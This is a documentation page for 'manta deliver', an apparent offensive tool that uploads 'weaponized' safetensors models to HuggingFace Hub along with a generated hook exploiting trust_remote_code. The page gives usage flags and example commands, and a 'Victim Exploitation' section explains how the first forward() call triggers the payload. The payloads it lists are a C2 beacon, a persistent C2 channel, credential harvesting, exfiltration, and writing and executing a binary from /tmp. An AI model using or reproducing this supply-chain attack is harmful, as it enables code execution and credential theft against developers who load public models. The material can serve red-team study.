manta deliver¶
Package and upload weaponized models to HuggingFace Hub or generic HTTP registries. Generates all required files for automated payload extraction via trust_remote_code.
Usage¶
# HuggingFace Hub delivery
manta deliver hf \
--model <WEAPONIZED_MODEL> \
--repo-id <USER/REPO> \
--payload-type <TYPE> \
[--class-name <NAME>] \
[--private]
# HTTP registry delivery (planned)
manta deliver http --model <MODEL> --url <REGISTRY_URL>
Subcommands¶
deliver hf¶
Upload a weaponized model to HuggingFace Hub with automatic hook generation.
| Flag | Short | Default | Description |
|---|---|---|---|
--model |
-m |
required | Weaponized model file (safetensors) |
--repo-id |
-r |
required | HuggingFace repo (user/model-name) |
--payload-type |
-t |
required | Payload type: beacon, credentials, c2config, tool, exfil |
--class-name |
auto-derived | Override generated Python class name | |
--private |
false |
Create a private repository | |
--token |
$HF_TOKEN |
HuggingFace API token (defaults to environment variable) |
Generated Files¶
deliver hf generates three files and uploads them to the Hub:
| File | Purpose |
|---|---|
model.safetensors |
Weaponized model (normalized to canonical filename) |
modeling_hook.py |
Python hook class with forward() trigger for payload extraction and dispatch |
config.json |
Model configuration with auto_map entry pointing to the hook class |
modeling_hook.py¶
The generated hook:
- Subclasses
PreTrainedModelwith a class name derived from the repo slug (or--class-name) - Overrides
forward()to extract the payload on first call using the embedded extraction key - Dispatches the payload based on
--payload-type(beacon → HTTP callback, tool → write + execute, etc.) - Sets a one-shot flag to prevent re-triggering
- Returns normal model output after extraction
config.json¶
Contains auto_map with format:
This tells HuggingFace's AutoModel.from_pretrained() to dynamically load the hook class when trust_remote_code=True is set.
Pipeline¶
manta deliver hf
├─ Normalize model filename → model.safetensors
├─ Generate modeling_hook.py (derive_class_name from repo slug)
├─ Generate config.json with auto_map
├─ Create HuggingFace repo (--private optional)
└─ Upload all three files to Hub
Victim Exploitation¶
On the victim side, a single line triggers the full chain:
from transformers import AutoModel
model = AutoModel.from_pretrained("user/model-name", trust_remote_code=True)
output = model(input_ids) # ← first forward() extracts and dispatches payload
The hook fires on forward() rather than load_state_dict because HuggingFace transformers 5.x+ uses direct parameter assignment, bypassing load_state_dict entirely. The forward() trigger works across all transformers versions.
Examples¶
# Embed a beacon payload and deliver to HuggingFace
manta embed -m clean.safetensors -o armed.safetensors -p beacon.bin -d 3 -k "pass" > key.json
manta deliver hf -m armed.safetensors -r prof-moody/my-model -t beacon --private
# Deliver with custom class name
manta deliver hf -m armed.safetensors -r prof-moody/custom-arch -t tool --class-name CustomArchModel
# Exfiltration delivery
manta deliver hf -m armed.safetensors -r prof-moody/data-model -t exfil
Payload Types¶
| Type | --payload-type |
Dispatch Action |
|---|---|---|
| Beacon | beacon |
HTTP POST to C2 URL embedded in payload |
| Credentials | credentials |
Write harvested secrets to disk |
| C2 Config | c2config |
Establish persistent C2 channel |
| Tool | tool |
Write binary to /tmp, chmod +x, execute |
| Exfil Data | exfil |
Write exfiltrated data to disk |